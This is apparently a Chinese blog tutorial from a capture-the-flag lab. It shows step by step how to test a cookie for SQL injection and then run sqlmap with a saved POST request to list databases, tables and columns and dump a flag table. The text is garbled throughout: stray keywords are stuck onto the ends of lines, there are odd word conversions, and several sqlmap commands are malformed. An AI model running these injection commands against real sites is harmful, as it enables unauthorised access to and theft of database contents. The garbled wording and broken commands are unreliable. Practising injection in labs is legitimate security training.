sqlmap的post注入

目錄

  1. sqlmap的POST注入
  2. cookie注入暴數據庫

 POST注入

1.驗證存在注入mysql

正常數據包"cookie:user=user"修改"cookie:user=admin"後都會出現flag參數sql

驗證Cookie: user=admin’ and ‘1’=1’報錯,回顯沒有flag,說明這種狀況就存在注入數據庫

2.複製post另存爲1.txt文件cookie

>>這裏是修改cookie後進行注入的,那麼要結合cookie注入來看post注入的原理,其實兩個是要聯合進行注入的,互不影響。post

 

cookie注入

 所謂的POST注入是發送POST請就包進行注入,cookie注入是修改cookie信息進行假裝身份或者說是做爲一個注入點進行滲透spa

1.暴數據庫

>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  --dbsblog

>>能夠看到有四個數據庫string

POST文件1.txt這裏要寫文件位置如:/root/1.txttable

cookie要寫成:--cookie="user=admin"class

 --string參數,用來來指定結果爲true時頁面所包含的字符,不包含這個字符的都會被判斷爲false:--string=「flag」表示正確時候回顯flag這個單詞

指定數據庫類型:--dbms=mysql

暴數據庫:--dbs

2.猜表

>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  -D employee --tables

 

>>猜出employee數據庫下有三個表

對特定的數據庫進行猜表:-D  數據庫名

猜表:--tables

其它的參數不變

3.表fllaagg中的列

>sqlmap -r 1.txt -p --cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  -D employee -T fllaagg --columns

猜列要指定數據庫、表:-D  數據庫   -T  數據表  

猜列:--columns

4.猜表中的字段

>sqlmap  -r  1.txt  -p - -cookie="user=admin" -p user --level 2 --string="flag" --dbms=mysql  -D employee -T fllaagg "flag" --dump

 

>>找到包含flag的字段

猜字段要指定數據庫、表、內容:-D  數據庫  -T  數據表   "內容"

猜字段:--dump

 一樣的方法能夠查看其它數據庫、表的內容,注入點方法也是同樣的,這裏注入點爲cookie修改數據後的數據包。若是自己POST數據包存在注入直接使用post注入,能夠不用加cookie注入--cookie「user=admin」相似這樣的參數。

相關文章
相關標籤/搜索